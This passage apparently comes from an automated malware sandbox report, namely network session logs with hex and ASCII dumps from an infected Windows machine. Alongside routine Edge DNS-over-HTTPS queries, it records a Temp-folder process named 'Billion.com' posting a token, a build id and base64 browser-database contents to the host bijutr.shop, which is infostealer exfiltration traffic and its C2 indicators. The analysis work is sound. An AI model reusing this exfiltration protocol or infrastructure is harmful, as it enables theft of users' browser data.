                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        29192.168.2.649996162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6c64e7b0f90-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        30192.168.2.649997162.159.61.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6c6f9365e64-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom'Pc)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        31192.168.2.649995188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----NGVAAIE3W4EU37YMYCB1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 207993
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------NGVAAIE3W4EU37YMYCB1Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                        Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:31 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        32192.168.2.649998172.64.41.34437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:29 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f72a6c72d5a42bb-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 02 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        33192.168.2.650011188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:31 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----Q90R90ZMOZUAIMGDJMOZ
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 68733
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
